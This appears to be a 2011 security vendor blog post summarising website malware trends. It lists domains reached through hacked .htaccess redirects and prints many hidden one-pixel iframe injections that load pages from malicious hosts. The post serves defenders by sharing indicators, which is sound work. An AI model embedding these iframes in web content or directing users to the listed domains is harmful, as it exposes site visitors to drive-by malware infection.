Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il

We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner.
 
For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability.
If your site is currently compromised with malware or spam and you need help, sign up with us here: http://sucuri.net/signup. We will clean your site and get it off from Google’s blacklist.

.htaccess redirections

We are seeing many sites with their .htaccess hacked. It redirects their users to some Russian and Polish domains:
http://softwareid.ru/zisec/index.php
http://breakingbad.osa.pl/
http://privacyyour.ru/xfast/index.php
http://activationsoftware.ru/turbom/index.php
http://distributioncorporate.ru/kloac/index.php
http://dgsdfhsdfh.osa.pl
http://now-protect.ru/accaunt/index.php
http://yourprivacy.ru/product/index.php
http://internet-safeness.ru/team/index.php
http://safenesscontent.ru/s4one/index.php

Malicious iframes

We are seeing many malicious iframes, specially from free domains (.cu.cc, .co.cc, etc). Also from some domains faking to be from google, like toolbarqueries-google.info, counter-google.com, counter-wordpress.com, etc:
http://toolbarqueries-google.info
http://whatwesave.cu.cc
http://bkmb.net/
http://gertalo8olw.c0m.li/forum.php?tp=134539292
http://dvotjtnc.co.tv/i.php?go=1
http://matreshka5.cx.cc/index.php?tp=38967d9a9d6df9e3
http://iframeshop.net/sti.php?id=123444
http://linkdock.com/content.php
http://sockscape.gv.vg/showthread.php?t=50170030
http://sommerandengelhart.com/genall.cgi
Examples of iframes:
<iframe src="http://prettyrosseande.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://bastalevarrga.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://bastalevarrga.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://fzwbwwvft.co.tv/i.php?go=1" width="1" height="1"></iframe>
<iframe src="http://narmnqlahb.co.tv/i.php?go=1" width="3" height="3"></iframe>
<iframe src=’http://rynothedyno.gv.vg/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://fwzlwke.co.tv/?go=1" width="1" height="1">
<iframe src=’http://hcirfiwcsmo.cu.cc/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sandradohn.cu.cc/showthread.php?t=10170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sail4kids.cu.cc/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://bagsbybetty.gv.vg/showthread.php?t=40170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://vkcomics.ka.hn/showthread.php?t=50170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sincitycash.gv.vg/showthread.php?t=50170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://ycnnfnw.co.tv/?go=1" width="1" height="1">
<iframe src=’http://digitalday.ka.hn/showthread.php?t=10170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://darcy4h.cu.cc/showthread.php?t=80170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://hipoteca049.gv.vg/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://lakotasales.cu.cc/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://topbeatech.ka.hn/showthread.php?t=30170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://change1life.gv.vg/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://mindsvision.ka.hn/showthread.php?t=70170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://ellrcsh.co.tv/?go=1" width="1" height="1">
<iframe src=’http://myclubbonus.cu.cc/showthread.php?t=60170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://indobatiks.cu.cc/showthread.php?t=40170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe frameborder=0 height=1 width=1 scrolling=no src="http://bkmb.net/"..

 
And many more.. Those are just some samples. If you think your site might be compromised, scan it on our scanner: http://sitecheck.sucuri.net
 

This entry was posted in blacklisted, hacked, hacked, htaccess, iframes and tagged , , , , . Bookmark the permalink.

Comments are closed.